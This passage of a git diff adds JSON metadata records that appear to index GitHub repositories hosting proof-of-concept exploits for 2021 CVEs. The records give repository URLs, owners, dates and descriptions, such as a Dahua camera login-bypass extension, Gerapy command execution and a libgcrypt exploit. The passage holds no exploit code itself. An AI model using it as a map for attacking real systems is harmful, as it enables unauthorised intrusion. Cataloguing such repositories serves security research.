+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113451397?v=4",
+ "html_url": "https:\/\/github.com\/DonVorrin"
+ },
+ "html_url": "https:\/\/github.com\/DonVorrin\/CVE-2021-32789",
+ "description": "Authenticated Blind SQL Injection. Wordpress woocommerce plugin versions >= 2.5.0",
+ "fork": false,
+ "created_at": "2024-02-08T19:02:17Z",
+ "updated_at": "2024-02-08T19:04:47Z",
+ "pushed_at": "2024-02-08T19:37:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3279.json b/2021/CVE-2021-3279.json
new file mode 100644
index 0000000000..6e2900da63
--- /dev/null
+++ b/2021/CVE-2021-3279.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484741600,
+ "name": "CVE-2021-3279",
+ "full_name": "rafaelchriss\/CVE-2021-3279",
+ "owner": {
+ "login": "rafaelchriss",
+ "id": 86614504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86614504?v=4",
+ "html_url": "https:\/\/github.com\/rafaelchriss"
+ },
+ "html_url": "https:\/\/github.com\/rafaelchriss\/CVE-2021-3279",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T12:30:21Z",
+ "updated_at": "2022-04-23T12:30:21Z",
+ "pushed_at": "2022-04-23T12:31:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32804.json b/2021/CVE-2021-32804.json
new file mode 100644
index 0000000000..e310a79401
--- /dev/null
+++ b/2021/CVE-2021-32804.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401572813,
+ "name": "CVE-2021-32804",
+ "full_name": "yamory\/CVE-2021-32804",
+ "owner": {
+ "login": "yamory",
+ "id": 51432046,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51432046?v=4",
+ "html_url": "https:\/\/github.com\/yamory"
+ },
+ "html_url": "https:\/\/github.com\/yamory\/CVE-2021-32804",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-31T04:32:38Z",
+ "updated_at": "2022-01-17T07:37:21Z",
+ "pushed_at": "2021-08-31T05:19:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 9
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3281.json b/2021/CVE-2021-3281.json
new file mode 100644
index 0000000000..3dd2a38810
--- /dev/null
+++ b/2021/CVE-2021-3281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 383067956,
+ "name": "CVE-2021-3281",
+ "full_name": "lwzSoviet\/CVE-2021-3281",
+ "owner": {
+ "login": "lwzSoviet",
+ "id": 30397594,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30397594?v=4",
+ "html_url": "https:\/\/github.com\/lwzSoviet"
+ },
+ "html_url": "https:\/\/github.com\/lwzSoviet\/CVE-2021-3281",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-05T08:25:26Z",
+ "updated_at": "2022-01-31T11:44:07Z",
+ "pushed_at": "2021-07-05T08:47:14Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32819.json b/2021/CVE-2021-32819.json
new file mode 100644
index 0000000000..80e01c0be7
--- /dev/null
+++ b/2021/CVE-2021-32819.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 376344697,
+ "name": "CVE-2021-32819",
+ "full_name": "Abady0x1\/CVE-2021-32819",
+ "owner": {
+ "login": "Abady0x1",
+ "id": 42253363,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42253363?v=4",
+ "html_url": "https:\/\/github.com\/Abady0x1"
+ },
+ "html_url": "https:\/\/github.com\/Abady0x1\/CVE-2021-32819",
+ "description": "SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.",
+ "fork": false,
+ "created_at": "2021-06-12T17:09:48Z",
+ "updated_at": "2024-06-21T09:59:35Z",
+ "pushed_at": "2021-06-12T17:17:41Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32849.json b/2021/CVE-2021-32849.json
new file mode 100644
index 0000000000..fbdda0a34c
--- /dev/null
+++ b/2021/CVE-2021-32849.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 438109831,
+ "name": "CVE-2021-32849",
+ "full_name": "bb33bb\/CVE-2021-32849",
+ "owner": {
+ "login": "bb33bb",
+ "id": 5463104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4",
+ "html_url": "https:\/\/github.com\/bb33bb"
+ },
+ "html_url": "https:\/\/github.com\/bb33bb\/CVE-2021-32849",
+ "description": "Gerapy clone background remote command execution",
+ "fork": false,
+ "created_at": "2021-12-14T03:53:55Z",
+ "updated_at": "2022-04-03T09:26:19Z",
+ "pushed_at": "2021-11-29T06:41:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 485253196,
+ "name": "cve-2021-32849",
+ "full_name": "lowkey0808\/cve-2021-32849",
+ "owner": {
+ "login": "lowkey0808",
+ "id": 49674960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4",
+ "html_url": "https:\/\/github.com\/lowkey0808"
+ },
+ "html_url": "https:\/\/github.com\/lowkey0808\/cve-2021-32849",
+ "description": "cve-2021-32849(gerapy命令执行)",
+ "fork": false,
+ "created_at": "2022-04-25T06:44:46Z",
+ "updated_at": "2023-09-16T19:27:23Z",
+ "pushed_at": "2022-04-25T06:50:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3291.json b/2021/CVE-2021-3291.json
new file mode 100644
index 0000000000..5f8f2b0a03
--- /dev/null
+++ b/2021/CVE-2021-3291.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361407419,
+ "name": "CVE-2021-3291",
+ "full_name": "ImHades101\/CVE-2021-3291",
+ "owner": {
+ "login": "ImHades101",
+ "id": 52188500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52188500?v=4",
+ "html_url": "https:\/\/github.com\/ImHades101"
+ },
+ "html_url": "https:\/\/github.com\/ImHades101\/CVE-2021-3291",
+ "description": "rebuild cve",
+ "fork": false,
+ "created_at": "2021-04-25T11:18:09Z",
+ "updated_at": "2022-11-09T18:12:04Z",
+ "pushed_at": "2021-04-25T11:42:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33026.json b/2021/CVE-2021-33026.json
new file mode 100644
index 0000000000..796538d1a0
--- /dev/null
+++ b/2021/CVE-2021-33026.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 425043477,
+ "name": "CVE-2021-33026",
+ "full_name": "CarlosG13\/CVE-2021-33026",
+ "owner": {
+ "login": "CarlosG13",
+ "id": 69405457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69405457?v=4",
+ "html_url": "https:\/\/github.com\/CarlosG13"
+ },
+ "html_url": "https:\/\/github.com\/CarlosG13\/CVE-2021-33026",
+ "description": "Pickle Serialization Remote Code Execution - Memcached Poisoning",
+ "fork": false,
+ "created_at": "2021-11-05T18:11:54Z",
+ "updated_at": "2024-05-18T22:35:21Z",
+ "pushed_at": "2021-11-05T21:04:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33034.json b/2021/CVE-2021-33034.json
new file mode 100644
index 0000000000..0e29dc345c
--- /dev/null
+++ b/2021/CVE-2021-33034.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486540482,
+ "name": "device_renesas_kernel_AOSP10_r33_CVE-2021-33034",
+ "full_name": "Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2021-33034",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2021-33034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T10:04:41Z",
+ "updated_at": "2023-03-08T01:53:20Z",
+ "pushed_at": "2022-04-28T10:41:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33044.json b/2021/CVE-2021-33044.json
new file mode 100644
index 0000000000..6e8b0ca098
--- /dev/null
+++ b/2021/CVE-2021-33044.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 416101106,
+ "name": "DahuaLoginBypass",
+ "full_name": "bp2008\/DahuaLoginBypass",
+ "owner": {
+ "login": "bp2008",
+ "id": 5639911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5639911?v=4",
+ "html_url": "https:\/\/github.com\/bp2008"
+ },
+ "html_url": "https:\/\/github.com\/bp2008\/DahuaLoginBypass",
+ "description": "Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authentication.",
+ "fork": false,
+ "created_at": "2021-10-11T22:08:47Z",
+ "updated_at": "2024-06-25T06:52:13Z",
+ "pushed_at": "2021-10-13T22:32:36Z",
+ "stargazers_count": 107,
+ "watchers_count": 107,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 107,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 418573441,
+ "name": "CVE-2021-33044",
+ "full_name": "dorkerdevil\/CVE-2021-33044",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-33044",
+ "description": "Dahua IPC\/VTH\/VTO devices auth bypass exploit",
+ "fork": false,
+ "created_at": "2021-10-18T16:02:41Z",
+ "updated_at": "2024-05-26T00:03:01Z",
+ "pushed_at": "2022-01-09T15:39:06Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 462035961,
+ "name": "alonzzzo",
+ "full_name": "Alonzozzz\/alonzzzo",
+ "owner": {
+ "login": "Alonzozzz",
+ "id": 100165245,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100165245?v=4",
+ "html_url": "https:\/\/github.com\/Alonzozzz"
+ },
+ "html_url": "https:\/\/github.com\/Alonzozzz\/alonzzzo",
+ "description": "Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H\/W rev. Ax with F\/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1",
+ "fork": false,
+ "created_at": "2022-02-21T21:22:43Z",
+ "updated_at": "2022-02-21T21:22:43Z",
+ "pushed_at": "2022-02-21T21:23:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708416982,
+ "name": "LoHongCam-CVE-2021-33044",
+ "full_name": "haingn\/LoHongCam-CVE-2021-33044",
+ "owner": {
+ "login": "haingn",
+ "id": 52133074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52133074?v=4",
+ "html_url": "https:\/\/github.com\/haingn"
+ },
+ "html_url": "https:\/\/github.com\/haingn\/LoHongCam-CVE-2021-33044",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-22T14:02:49Z",
+ "updated_at": "2023-10-22T14:06:32Z",
+ "pushed_at": "2023-10-22T14:03:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33045.json b/2021/CVE-2021-33045.json
new file mode 100644
index 0000000000..785a767696
--- /dev/null
+++ b/2021/CVE-2021-33045.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 415978923,
+ "name": "cve-2021-33045",
+ "full_name": "dongpohezui\/cve-2021-33045",
+ "owner": {
+ "login": "dongpohezui",
+ "id": 40270581,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40270581?v=4",
+ "html_url": "https:\/\/github.com\/dongpohezui"
+ },
+ "html_url": "https:\/\/github.com\/dongpohezui\/cve-2021-33045",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-11T15:11:48Z",
+ "updated_at": "2023-11-27T02:34:15Z",
+ "pushed_at": "2021-10-11T15:23:39Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3310.json b/2021/CVE-2021-3310.json
new file mode 100644
index 0000000000..a0447475e4
--- /dev/null
+++ b/2021/CVE-2021-3310.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 370482537,
+ "name": "CVE-2021-3310",
+ "full_name": "piffd0s\/CVE-2021-3310",
+ "owner": {
+ "login": "piffd0s",
+ "id": 7329476,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7329476?v=4",
+ "html_url": "https:\/\/github.com\/piffd0s"
+ },
+ "html_url": "https:\/\/github.com\/piffd0s\/CVE-2021-3310",
+ "description": "Western Digital MyCloud PR4100 Link Resolution Information Disclosure Vulnerability",
+ "fork": false,
+ "created_at": "2021-05-24T20:55:33Z",
+ "updated_at": "2021-06-21T02:06:49Z",
+ "pushed_at": "2021-05-24T21:05:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33104.json b/2021/CVE-2021-33104.json
new file mode 100644
index 0000000000..0cda58548e
--- /dev/null
+++ b/2021/CVE-2021-33104.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 614247020,
+ "name": "CVE-2021-33104",
+ "full_name": "rjt-gupta\/CVE-2021-33104",
+ "owner": {
+ "login": "rjt-gupta",
+ "id": 35985127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4",
+ "html_url": "https:\/\/github.com\/rjt-gupta"
+ },
+ "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2021-33104",
+ "description": "CVE-2021-33104 - Improper access control in the Intel(R) OFU software",
+ "fork": false,
+ "created_at": "2023-03-15T07:45:02Z",
+ "updated_at": "2023-06-01T01:05:24Z",
+ "pushed_at": "2023-03-15T07:46:21Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3317.json b/2021/CVE-2021-3317.json
new file mode 100644
index 0000000000..032595bbf9
--- /dev/null
+++ b/2021/CVE-2021-3317.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 356180253,
+ "name": "CVE-2021-3317",
+ "full_name": "Al1ex\/CVE-2021-3317",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-3317",
+ "description": "CVE-2021-3317",
+ "fork": false,
+ "created_at": "2021-04-09T07:36:46Z",
+ "updated_at": "2023-09-28T11:26:38Z",
+ "pushed_at": "2021-04-09T07:37:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3317",
+ "exploit",
+ "klogserver"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3345.json b/2021/CVE-2021-3345.json
new file mode 100644
index 0000000000..4ffd1e2b0b
--- /dev/null
+++ b/2021/CVE-2021-3345.json
@@ -0,0 +1,71 @@
+[
+ {
+ "id": 334617977,
+ "name": "CVE-2021-3345",
+ "full_name": "MLGRadish\/CVE-2021-3345",
+ "owner": {
+ "login": "MLGRadish",
+ "id": 23532098,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23532098?v=4",
+ "html_url": "https:\/\/github.com\/MLGRadish"
+ },
+ "html_url": "https:\/\/github.com\/MLGRadish\/CVE-2021-3345",
+ "description": "POC exploit of CVE-2021-3345, a vulnerability in libgcrypt version 1.9.0",
+ "fork": false,
+ "created_at": "2021-01-31T09:28:14Z",
+ "updated_at": "2024-05-09T10:53:08Z",
+ "pushed_at": "2021-02-07T02:40:38Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-3345",
+ "exploit",
+ "exploit-development",
+ "exploits",
+ "libgcrypt",
+ "poc",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765419523,
+ "name": "CVE-2021-3345",
+ "full_name": "SpiralBL0CK\/CVE-2021-3345",
+ "owner": {
+ "login": "SpiralBL0CK",
+ "id": 25670930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4",
+ "html_url": "https:\/\/github.com\/SpiralBL0CK"
+ },
+ "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2021-3345",
+ "description": "Actual working exploit for CVE-2021-3345",
+ "fork": false,
+ "created_at": "2024-02-29T22:05:44Z",
+ "updated_at": "2024-03-01T01:53:22Z",
+ "pushed_at": "2024-02-29T22:22:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3347.json b/2021/CVE-2021-3347.json
new file mode 100644
index 0000000000..d09e13a35e
--- /dev/null
+++ b/2021/CVE-2021-3347.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485757844,
+ "name": "linux-4.19.72_CVE-2021-3347",
+ "full_name": "nanopathi\/linux-4.19.72_CVE-2021-3347",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2021-3347",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T11:32:34Z",
+ "updated_at": "2022-04-26T12:12:00Z",
+ "pushed_at": "2023-10-26T12:57:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33558.json b/2021/CVE-2021-33558.json
new file mode 100644
index 0000000000..8b2f823584
--- /dev/null
+++ b/2021/CVE-2021-33558.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 370638345,
+ "name": "CVE-2021-33558.",
+ "full_name": "mdanzaruddin\/CVE-2021-33558.",
+ "owner": {
+ "login": "mdanzaruddin",
+ "id": 48306735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48306735?v=4",
+ "html_url": "https:\/\/github.com\/mdanzaruddin"
+ },
+ "html_url": "https:\/\/github.com\/mdanzaruddin\/CVE-2021-33558.",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-25T09:33:21Z",
+ "updated_at": "2023-03-05T06:15:23Z",
+ "pushed_at": "2021-05-25T09:42:00Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 571407040,
+ "name": "CVE-2021-33558",
+ "full_name": "anldori\/CVE-2021-33558",
+ "owner": {
+ "login": "anldori",
+ "id": 101538840,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4",
+ "html_url": "https:\/\/github.com\/anldori"
+ },
+ "html_url": "https:\/\/github.com\/anldori\/CVE-2021-33558",
+ "description": "CVE-2021-33558 POC",
+ "fork": false,
+ "created_at": "2022-11-28T03:50:10Z",
+ "updated_at": "2022-11-29T04:29:20Z",
+ "pushed_at": "2022-11-28T03:52:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33560.json b/2021/CVE-2021-33560.json
new file mode 100644
index 0000000000..507a3ab0c5
--- /dev/null
+++ b/2021/CVE-2021-33560.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386681813,
+ "name": "PGP-client-checker-CVE-2021-33560",
+ "full_name": "IBM\/PGP-client-checker-CVE-2021-33560",
+ "owner": {
+ "login": "IBM",
+ "id": 1459110,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1459110?v=4",
+ "html_url": "https:\/\/github.com\/IBM"
+ },
+ "html_url": "https:\/\/github.com\/IBM\/PGP-client-checker-CVE-2021-33560",
+ "description": "Tool to check whether a PGP client is affected by CVE-2021-33560",
+ "fork": false,
+ "created_at": "2021-07-16T15:24:11Z",
+ "updated_at": "2023-07-19T16:23:56Z",
+ "pushed_at": "2023-07-19T16:23:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33564.json b/2021/CVE-2021-33564.json
new file mode 100644
index 0000000000..539b052fdd
--- /dev/null
+++ b/2021/CVE-2021-33564.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 370544854,
+ "name": "CVE-2021-33564",
+ "full_name": "mlr0p\/CVE-2021-33564",
+ "owner": {
+ "login": "mlr0p",
+ "id": 36525379,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36525379?v=4",
+ "html_url": "https:\/\/github.com\/mlr0p"
+ },
+ "html_url": "https:\/\/github.com\/mlr0p\/CVE-2021-33564",
+ "description": "Argument Injection in Dragonfly Ruby Gem",
+ "fork": false,
+ "created_at": "2021-05-25T02:48:08Z",
+ "updated_at": "2024-05-06T05:09:25Z",
+ "pushed_at": "2021-05-26T21:30:29Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 371425844,
+ "name": "CVE-2021-33564",
+ "full_name": "dorkerdevil\/CVE-2021-33564",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-33564",
+ "description": "Argument Injection in Dragonfly Ruby Gem exploit (backup)",
+ "fork": false,
+ "created_at": "2021-05-27T15:44:45Z",
+ "updated_at": "2023-09-28T11:28:07Z",
+ "pushed_at": "2021-05-27T15:45:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3360.json b/2021/CVE-2021-3360.json
new file mode 100644
index 0000000000..e0ce8da2f7
--- /dev/null
+++ b/2021/CVE-2021-3360.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 360354308,
+ "name": "CVE-2021-3360",
+ "full_name": "tcbutler320\/CVE-2021-3360",
+ "owner": {
